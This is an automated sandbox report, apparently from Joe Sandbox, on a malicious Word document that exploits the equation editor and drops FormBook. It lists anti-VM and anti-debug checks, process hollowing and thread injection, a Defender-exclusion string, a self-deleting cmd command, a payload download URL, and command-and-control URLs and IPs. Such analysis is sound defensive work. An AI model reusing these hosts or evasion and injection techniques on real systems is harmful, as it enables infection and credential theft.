          Source: ashlkyvc7592.exe, 00000004.00000002.425463492.0000000002241000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: ashlkyvc7592.exe, 00000004.00000002.425463492.0000000002241000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000000098604 second address: 000000000009860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 000000000009898E second address: 0000000000098994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1184Thread sleep time: -300000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe TID: 2672Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 2988Thread sleep time: -36000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_004088C0 rdtsc 5_2_004088C0
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000006.00000000.443682934.000000000457A000.00000004.00000001.sdmpBinary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_
          Source: explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.443682934.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000c.ex
          Source: explorer.exe, 00000006.00000000.511664775.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.433262826.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_004088C0 rdtsc 5_2_004088C0
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AC26F8 mov eax, dword ptr fs:[00000030h]5_2_00AC26F8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020226F8 mov eax, dword ptr fs:[00000030h]7_2_020226F8
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00409B30 LdrLoadDll,5_2_00409B30
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.texaszephyr.com
          Source: C:\Windows\explorer.exeDomain query: www.bandhancustomer.com
          Source: C:\Windows\explorer.exeDomain query: www.publicfigure.skin
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.184.102 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.volunteervabetweenk.com
          Source: C:\Windows\explorer.exeDomain query: www.1oavyx.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeSection unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 110000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeMemory written: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeThread register set: target process: 1764Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 1764Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe"Jump to behavior
          Source: explorer.exe, 00000006.00000000.427630812.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447568102.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.511801365.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.439598831.0000000000750000.00000002.00020000.sdmp, cmstp.exe, 00000007.00000002.686590550.0000000000A60000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
          Source: explorer.exe, 00000006.00000000.427630812.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447568102.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.511801365.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.439598831.0000000000750000.00000002.00020000.sdmp, cmstp.exe, 00000007.00000002.686590550.0000000000A60000.00000002.00020000.sdmpBinary or memory string: !Progman
          Source: explorer.exe, 00000006.00000000.427630812.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447568102.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.511801365.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.439598831.0000000000750000.00000002.00020000.sdmp, cmstp.exe, 00000007.00000002.686590550.0000000000A60000.00000002.00020000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeQueries volume information: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 528734 Sample: P.O-5433ERE.doc Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 50 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 12 other signatures 2->56 10 EQNEDT32.EXE 11 2->10         started        15 WINWORD.EXE 291 19 2->15         started        process3 dnsIp4 44 dell-tv.tk 37.0.9.166, 49165, 80 WKD-ASIE Netherlands 10->44 32 C:\Users\user\AppData\...\ashlkyvc7592.exe, PE32 10->32 dropped 34 C:\Users\user\AppData\...\ashlyzx[1].exe, PE32 10->34 dropped 74 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->74 17 ashlkyvc7592.exe 10->17         started        36 ~WRF{3D999299-2169...1-6FEE86AD4ADA}.tmp, Composite 15->36 dropped file5 signatures6 process7 signatures8 46 Tries to detect virtualization through RDTSC time measurements 17->46 48 Injects a PE file into a foreign processes 17->48 20 ashlkyvc7592.exe 17->20         started        process9 signatures10 58 Modifies the context of a thread in another process (thread injection) 20->58 60 Maps a DLL or memory area into another process 20->60 62 Sample uses process hollowing technique 20->62 64 Queues an APC in another process (thread injection) 20->64 23 explorer.exe 20->23 injected process11 dnsIp12 38 www.texaszephyr.com 23->38 40 www.volunteervabetweenk.com 172.67.184.102, 49169, 80 CLOUDFLARENETUS United States 23->40 42 6 other IPs or domains 23->42 66 System process connects to network (likely due to code injection or exploit) 23->66 27 cmstp.exe 23->27         started        signatures13 process14 signatures15 68 Modifies the context of a thread in another process (thread injection) 27->68 70 Maps a DLL or memory area into another process 27->70 72 Tries to detect virtualization through RDTSC time measurements 27->72 30 cmd.exe 27->30         started        process16

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp100%AviraEXP/CVE-2017-11882.Gen
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.0.ashlkyvc7592.exe.400000.10.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.ashlkyvc7592.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.ashlkyvc7592.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.ashlkyvc7592.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          texaszephyr.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.texaszephyr.com/op9t/?0l=exlpTNNXh0F&c0=4uZm8lPh56XAYP0u1p0c6SVxcutgTZuNbzhe7MVeNR3LwnMhhkFBXHHvU8jy6jgZH7Gcyg==0%Avira URL Cloudsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.volunteervabetweenk.com/op9t/?0l=exlpTNNXh0F&c0=WMWbw9/24XbwIiPl+aU7TY/mYt55hlmFa8WJlEktQGdJQVklk58s/CKKr8Th7+7tz7UKpw==0%Avira URL Cloudsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://www.publicfigure.skin/op9t/?c0=RQ8pabDbnEWS4MHppDnLpAnnVm0R7EKmWqTB7JHuP07woLOWNs0JhuHKNBpScYVLrEmjjw==&0l=exlpTNNXh0F0%Avira URL Cloudsafe
          http://java.sun.com0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://dell-tv.tk/ashlyzx.exe0%Avira URL Cloudsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe
          www.fcusd4.com/op9t/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          dell-tv.tk
          		37.0.9.166
          		truetrue
            		unknown
            publicfigure.skin
            		34.102.136.180
            		truefalse
              		unknown
              www.volunteervabetweenk.com
              		172.67.184.102
              		truetrue
                		unknown
                texaszephyr.com
                		34.102.136.180
                		truefalseunknown
                www.texaszephyr.com
                		unknown
                		unknowntrue
                  		unknown
                  www.1oavyx.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.bandhancustomer.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.publicfigure.skin
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.texaszephyr.com/op9t/?0l=exlpTNNXh0F&c0=4uZm8lPh56XAYP0u1p0c6SVxcutgTZuNbzhe7MVeNR3LwnMhhkFBXHHvU8jy6jgZH7Gcyg==false
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.volunteervabetweenk.com/op9t/?0l=exlpTNNXh0F&c0=WMWbw9/24XbwIiPl+aU7TY/mYt55hlmFa8WJlEktQGdJQVklk58s/CKKr8Th7+7tz7UKpw==true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.publicfigure.skin/op9t/?c0=RQ8pabDbnEWS4MHppDnLpAnnVm0R7EKmWqTB7JHuP07woLOWNs0JhuHKNBpScYVLrEmjjw==&0l=exlpTNNXh0Ffalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://dell-tv.tk/ashlyzx.exetrue
                        • Avira URL Cloud: safe
                        		unknown
                        www.fcusd4.com/op9t/true
                        • Avira URL Cloud: safe
                        		low

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.windows.com/pctv.explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpfalse
                          		high
                          http://investor.msn.comexplorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpfalse
                            		high
                            http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpfalse
                              		high
                              http://wellformedweb.org/CommentAPI/explorer.exe, 00000006.00000000.516217936.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmpfalse
                                		high
                                http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEMexplorer.exe, 00000006.00000000.451072374.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.516156334.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443806201.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.433262826.00000000045D6000.00000004.00000001.sdmpfalse
                                  		high
                                  http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.hotmail.com/oeexplorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpfalse
                                    		high
                                    http://treyresearch.netexplorer.exe, 00000006.00000000.516217936.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 00000006.00000000.442612766.0000000003DF8000.00000004.00000001.sdmpfalse
                                      		high
                                      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmpfalse
                                        		high
                                        http://java.sun.comexplorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.icra.org/vocabulary/.explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.msn.com/de-de/?ocid=iehpCexplorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000006.00000000.439681149.0000000001BE0000.00000002.00020000.sdmpfalse
                                            		high
                                            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.450661443.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438489061.000000000845A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.446213289.0000000008426000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432704474.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443456223.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmpfalse
                                              		high
                                              http://investor.msn.com/explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpfalse
                                                		high
                                                http://www.msn.com/?ocid=iehpexplorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.msn.com/de-de/?ocid=iehpexplorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.450661443.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438489061.000000000845A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443564000.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.446213289.0000000008426000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432704474.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.450764826.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432948850.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443456223.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmpfalse
                                                      		high
